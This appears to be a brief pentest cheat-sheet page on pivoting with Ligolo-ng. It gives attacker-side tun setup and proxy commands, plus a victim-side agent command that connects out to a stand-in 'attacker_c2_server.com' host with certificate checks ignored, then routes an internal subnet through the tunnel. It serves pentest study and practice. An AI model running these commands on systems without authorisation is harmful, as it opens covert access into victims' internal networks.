Ligolo-ng
#In Attacker machine
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
#To start the Server
$ ./proxy -selfcert
#In Victim Mahchine
$ ./agent -connect attacker_c2_server.com:11601 -ignore-cert
#Add IP routing rule
sudo ip route add 192.168.0.0/24 dev ligolo
Last updated